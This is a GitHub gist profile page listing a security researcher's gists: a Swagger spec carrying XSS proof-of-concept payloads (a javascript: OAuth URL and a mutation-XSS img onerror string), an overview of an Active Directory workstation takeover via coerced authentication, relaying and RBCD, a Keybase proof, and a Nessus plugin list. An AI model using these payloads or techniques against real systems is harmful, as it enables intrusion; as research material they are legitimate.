Skip to content

Instantly share code, notes, and snippets.

View lightoyou's full-sized avatar

Vincent R0m3 lightoyou

56 followers · 251 following
View GitHub Profile
@lightoyou
lightoyou / gist:c9d9108e9df0ff1f59ff206f10253195
Last active July 4, 2022 09:08
test
swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
info:
version: "0.0.1"
title: Swagger UI
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
@lightoyou
lightoyou / Workstation-Takeover.md
Created February 1, 2022 12:57 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@lightoyou
lightoyou / gist:615d5afbe0afdcd15cb9eb6dc9edb573
Created March 3, 2021 15:07
keybase.md
### Keybase proof
I hereby claim:
* I am lightoyou on github.
* I am lightoyou (https://keybase.io/lightoyou) on keybase.
* I have a public key ASDNUZ4YPV0WYYfe0hCGOZYl9u6JjBRfmmd_v0ubiNRbVwo
To claim this, I am signing this object:
@lightoyou
lightoyou / Log_Correlation_Engine.csv
Created June 18, 2019 09:55
Nessus Plugin
We can't make this file beautiful and searchable because it's too large.
"Cloud Services";"8536";"YAHOO! NOTEPAD Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8533";"WORKDAY Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"5275";"Gmail Usage Detection (deprecated)";"Nessus Network Monitor";"info"
"Cloud Services";"8595";"Docker Server Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8503";"PRODUCTEEV Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8464";"JOBNIMBUS Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8429";"BASECAMP Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"6571";"Carbonite 'Cloud' Backup Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8422";"ASANA Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8493";"PAM Cloud Service Detection";"Nessus Network Monitor";"info"